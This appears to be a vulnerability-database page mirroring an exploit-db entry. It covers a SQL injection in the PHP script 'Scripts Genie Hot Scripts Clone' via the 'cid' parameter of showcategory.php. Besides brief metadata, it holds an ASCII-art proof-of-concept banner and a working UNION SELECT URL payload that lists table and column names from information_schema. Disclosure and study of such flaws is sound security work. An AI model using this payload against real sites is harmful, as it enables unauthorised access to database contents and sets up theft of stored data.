Scripts Genie Hot Scripts Clone - 'showcategory.php?cid' SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1064736 漏洞类型
发布时间 2013-02-18 更新时间 2013-02-18
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24516
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+=-
+             Security Flaw            +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+=-
+                         __     _     +
+ ___  ___  ___ _   _  /\ \ \___| |_   +
+/ __|/ _ \/ __| | | |/  \/ / _ \ __|  +
+\__ \  __/ (__| |_| / /\  /  __/ |_   +
+|___/\___|\___|\__,_\_\ \/ \___|\__|  +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-+
+Scripts Genie Hot Scripts Clone Script+
+  SQL Injection Vulnerability PoC     +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+=+
+       Discovered by Easy Laster      +
+      Autor : Easy Laster             +
+       Date   :17.02.2013             +
+      Script:Scripts Genie            +
+        Hot Scripts Clone Script      +
+        scriptsgenie.com              +
+       Price  ::$1.75                 +
+      Language: PHP                   +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-=
+              Vulnerability           +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-=
+hutscripts/showcategory.php?cid=[SQLi]+
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-=
+           Proof of Concept           +
+        Crawling the MYSQL Stack      +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-=
/hutscripts/showcategory.php?cid=21+uni
on+select+1,concat_ws(0x3a,table_schema
,table_name,column_name),3,4,5+from+inf
ormation_schema.columns+limit+180,1--+